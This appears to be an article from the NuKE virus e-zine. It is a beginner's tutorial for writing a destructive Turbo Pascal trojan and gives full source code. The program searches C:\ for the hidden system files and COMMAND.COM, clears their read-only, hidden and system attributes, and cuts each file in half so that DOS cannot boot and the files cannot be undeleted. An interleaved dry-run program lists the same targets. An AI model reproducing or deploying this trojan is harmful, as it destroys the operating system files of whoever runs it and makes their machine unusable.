
NuKE Issue 01-023

  

──────────────────────> Turbo Pascal Programming :

I have often been asked how to write a virus with Turbo Pascal. My answer is
that it is not worth trying. A file infector has to stay resident and hook
the DOS interrupts it needs to catch file access. Strictly speaking the DOS
unit does allow that (GetIntVec, SetIntVec and Keep exist), but the runtime
library makes the result large and clumsy next to assembler, so Turbo Pascal
TSRs are mostly one-shot deals that fire after a certain time or a certain
number of keystrokes. Turbo Pascal is, however, an excellent language to
program trojans with, surpassing almost everything possible with BASIC, and
it is relatively easy to learn compared with assembler or even C.
What I'm going to attempt here is to explain the steps in creating a simple
Turbo Pascal trojan. This is for beginners only: I simply want to show the
procedures and functions that can be used in trojan programming, so I will
detail every step and reproduce the complete source at the end of this
article. I'm using the Turbo Pascal v5.5 compiler.
Important: all lines beginning with ">" are part of the program. Type these
lines in, but omit the ">".

Step 1- Initializing the program: Without this you're not going to get very
far. So just type in the following:

> PROGRAM TROJAN;
> USES DOS;

I'm not putting in the CRT unit because we have no need for it here.

Step 2- Figure out what you're going to do: The hardest part of programming a
trojan is coming up with a worthwhile concept. After that, programming
should be a breeze. For this one we will simply go to the root
directory and destroy the two hidden system (.SYS) files and COMMAND.COM.
Step 3- Figure out how you're going to do it: Once you have the plan thought
up, the programming part shouldn't be too hard. Our trojan needs a way
to locate its files. Since the system files differ from one system to
another (IO.SYS and MSDOS.SYS under MS-DOS, IBMBIO.COM and IBMDOS.COM
under PC-DOS), we cannot rely on fixed filenames. So we will use a
FindFirst/FindNext search procedure similar to the one in my bypass
trojan v1.0 (if you read that article) to find all .SYS and .COM files
in the root directory of the C: drive. I chose the C: drive for obvious
reasons, but you can repeat the process for all logical drives A: to E:
and beyond. You also need to define a few variables that will be used
later on. Type the following in:

> VAR
> Target : SEARCHREC; { Fundamental. This is an internal record that }
> { is necessary for the Findfirst procedure. }
> T : FILE;
> PROCEDURE KILL (FIND : STRING);
> BEGIN

Now what we want is to get drive C: so type in the following:

> Chdir ('C:\');

Now we have to find our target files. For this we will use the
internal procedure Findfirst. The command string for Findfirst is:

FindFirst(Path : string; Attr : Word; var S : SearchRec);

Where Path is the files we want to find. Path will be called from the
main program. S is the variable Target defined above and Attr is the
attributes we are looking for. Here is a list of attributes for the
Findfirst and other procedures:
ReadOnly = $01;
Hidden = $02;
SysFile = $04;
VolumeID = $08;
Directory = $10;
Archive = $20;
AnyFile = $3F;

Since we are looking for all files with any attribute except
directories, our Attr will be $3F - $10 (= $2F). So type this in:

> Findfirst (FIND,($3F - $10),Target);
> WHILE DOSERROR = 0 DO
> Begin
If a matching file is found, DosError will equal 0; otherwise the loop
never runs and we return to the main program, our task achieved. Now
let's say our trojan has found a file. We must assign it to a file
variable, the variable T defined above. The entry found by Findfirst is
saved in the Target record, and its filename is Target.Name. So type in
the following:

> ASSIGN (T,Target.name);

Now we must change the file's attributes to archive only, in case it is
read-only, hidden or system (the .SYS files). For this we use the
procedure SetFAttr, which must be called on a file that is assigned but
not yet opened. Its declaration is

SetFAttr(var F; Attr : Word);

Where F is the T variable and Attr is its new attribute word. So type
in the following:

> Setfattr (T,$20);

This gives the archive attribute (and nothing else) to our file. Having
bypassed file write-protection, we must now check for disk
write-protection. Physical disk write-protection cannot be removed, so
the best we can do is check for it and, if found, abort the program or
move on to another drive. To check for write protection we create a
directory on the drive and look at IOResult: if the directory is
created successfully, IOResult equals 0 and the disk is not
write-protected, otherwise we abort. The {$I-} and {$I+} directives
are important: they turn I/O checking off around the MkDir so a failure
sets IOResult instead of raising a runtime error. Reading IOResult also
clears it, so test it exactly once. (One probe per drive would do; the
loop below repeats it for every file, which is wasteful but harmless.)
So type in the following:
> {$I-}
> Mkdir ('á');
> {$I+}
> IF IORESULT = 0 THEN
> Begin
> Rmdir ('á');

We use á as this is less obvious in the compiled program. Now that we
can access our target file properly, we must decide on a way to
destroy it. We could erase it, but an erased file can be repaired with
undelete. So I choose to cut the file in half, making it unusable. For
this we use Truncate, which cuts the file at the current file position
and discards everything after it. So we must seek halfway into the
file before truncating. Reset opens an untyped file with a default
record size of 128 bytes, so FileSize(T) DIV 2 is the halfway point
measured in 128-byte records. Type in the following:

> Reset (T);
> Seek (T,Filesize(T) DIV 2);
> Truncate (T);
> Close (T);
> End

Don't forget to close the file (Close(T)). Now we add the branch taken
when the drive is write-protected: Exit leaves procedure KILL
altogether. Type in the following:

> ELSE
> Exit;
> Findnext (Target);
> End;
> END;

Findnext continues the search begun by Findfirst. When no more files
match, DosError becomes non-zero, the WHILE loop ends and the procedure
returns. We must now type up the main program. The only check done here
is whether drive C: exists (the ChDir succeeds), after which we execute
procedure KILL for .COM and .SYS files. Type in the following:

> BEGIN
> {$I-}
> Chdir ('C:\');
> {$I+}
> IF IORESULT = 0 THEN
> Begin
> KILL ('*.COM');
> KILL ('*.SYS');
> End;
> END.

Each call passes its wildcard in FIND, which Findfirst uses as its Path.

Well, that ends this program. I made it as detailed as possible for Turbo
Pascal beginners; more advanced programmers should have no trouble with it.
To anyone wanting to learn more, I suggest reading through all the
procedures of the DOS unit, as these are the most helpful in trojan
programming. The full source follows. If you want to test it, replace C:\
with A:\ and try it on a disposable system disk in drive A: (for example).
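Before testing the real thing, it helps to see exactly what the search
mask and the write-protect probe would select. The following is an added
example, not code from the original article: a read-only dry run of KILL,
written against the Turbo Pascal 5.5 DOS unit the article uses. It walks a
root directory with the same $3F - $10 mask and the same FindFirst/FindNext
loop, decodes each entry's attribute bits, reports which files the trojan
would truncate and roughly how much of each would survive (Reset's default
record size for an untyped file is 128 bytes), and performs the article's
MkDir/RmDir write-protect probe once per drive instead of once per file.
The program name, the AttrStr/DriveWritable/Report helpers and the _WPROBE
directory name are this example's own choices, and the drive letter comes
from the command line (A:\ if none is given).

```pascal
{ Added example, not from the original article: a read-only dry run of
  KILL. Same mask, same FindFirst/FindNext loop, but it only reports what
  the trojan would truncate. Turbo Pascal 5.5, DOS unit. Program name,
  helper names and the _WPROBE directory name are this example's own. }
PROGRAM DRYRUN;
USES DOS;

CONST
  Mask = $3F - $10;       { the article's mask: AnyFile minus Directory }

VAR
  Root   : STRING;        { e.g. 'A:\', taken from the command line }
  Target : SEARCHREC;
  Count  : WORD;

{ Decode a DOS attribute byte into a six-character flag string (RHSVDA). }
FUNCTION AttrStr (A : WORD) : STRING;
VAR S : STRING;
BEGIN
  S := '';
  IF (A AND ReadOnly)  <> 0 THEN S := S + 'R' ELSE S := S + '-';
  IF (A AND Hidden)    <> 0 THEN S := S + 'H' ELSE S := S + '-';
  IF (A AND SysFile)   <> 0 THEN S := S + 'S' ELSE S := S + '-';
  IF (A AND VolumeID)  <> 0 THEN S := S + 'V' ELSE S := S + '-';
  IF (A AND Directory) <> 0 THEN S := S + 'D' ELSE S := S + '-';
  IF (A AND Archive)   <> 0 THEN S := S + 'A' ELSE S := S + '-';
  AttrStr := S;
END;

{ The article's write-protect probe (MkDir/RmDir with I/O checking off),
  done once per drive. IOResult is read exactly once per {$I-} block,
  because reading it clears it. The probe directory is removed again. }
FUNCTION DriveWritable (Dir : STRING) : BOOLEAN;
VAR
  Probe  : STRING;
  Status : INTEGER;
BEGIN
  Probe := Dir + '_WPROBE';   { constructed name, 8.3-safe }
  {$I-}
  MkDir (Probe);
  {$I+}
  IF IOResult = 0 THEN
  BEGIN
    {$I-}
    RmDir (Probe);
    {$I+}
    Status := IOResult;       { clear the status; a failed RmDir is not fatal }
    DriveWritable := TRUE;
  END
  ELSE
    DriveWritable := FALSE;
END;

{ Enumerate Root + Pattern exactly as KILL does and print each hit.
  The trojan truncates at FileSize(T) DIV 2 with Reset's default
  128-byte records, so the surviving length is about half the size,
  rounded down to a 128-byte boundary. }
PROCEDURE Report (Pattern : STRING);
BEGIN
  FindFirst (Root + Pattern, Mask, Target);
  WHILE DosError = 0 DO
  BEGIN
    { Mask $2F still admits volume labels; list only real files. }
    IF (Target.Attr AND (VolumeID OR Directory)) = 0 THEN
    BEGIN
      Inc (Count);
      WriteLn (AttrStr (Target.Attr), '  ', Target.Size:8, '  ',
               Root, Target.Name, '  -> about ',
               ((Target.Size DIV 128) DIV 2) * 128, ' bytes would survive');
    END;
    FindNext (Target);
  END;
END;

BEGIN
  IF ParamCount >= 1 THEN Root := ParamStr (1) ELSE Root := 'A:\';
  IF Root[Length (Root)] <> '\' THEN Root := Root + '\';
  IF DriveWritable (Root) THEN
    WriteLn (Root, ' is writable: KILL would proceed')
  ELSE
    WriteLn (Root, ' is write-protected: KILL would Exit');
  Count := 0;
  Report ('*.COM');
  Report ('*.SYS');
  WriteLn (Count, ' file(s) in ', Root, ' match the mask');
END.
```

Run it as DRYRUN A:\ against a boot floppy and compare its list with what
you expect KILL to hit; the line for each file also shows that SetFAttr is
only needed for entries carrying the R, H or S flags.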

Source:

PROGRAM TROJAN;
USES DOS;

VAR
  Target : SEARCHREC;          { filled in by Findfirst/Findnext }
  T      : FILE;               { untyped file, default 128-byte records }

{ Truncate every file in C:\ matching FIND to half its length. }
PROCEDURE KILL (FIND : STRING);
BEGIN
  Chdir ('C:\');
  Findfirst (FIND, ($3F - $10), Target);    { all attributes except Directory }
  WHILE DOSERROR = 0 DO                     { 0 = a matching file was found }
  Begin
    ASSIGN (T, Target.Name);
    Setfattr (T, $20);                      { drop read-only/hidden/system, keep Archive }
    {$I-}
    Mkdir ('á');                            { write-protect probe }
    {$I+}
    IF IORESULT = 0 THEN
    Begin
      Rmdir ('á');
      Reset (T);
      Seek (T, Filesize(T) DIV 2);          { halfway, in 128-byte records }
      Truncate (T);                         { discard everything after the position }
      Close (T);
    End
    ELSE
      Exit;                                 { drive is write-protected: leave KILL }
    Findnext (Target);
  End;
END;

BEGIN
  {$I-}
  Chdir ('C:\');                            { does drive C: exist? }
  {$I+}
  IF IORESULT = 0 THEN
  Begin
    KILL ('*.COM');
    KILL ('*.SYS');
  End;
END.

Mechanix [NuKE]
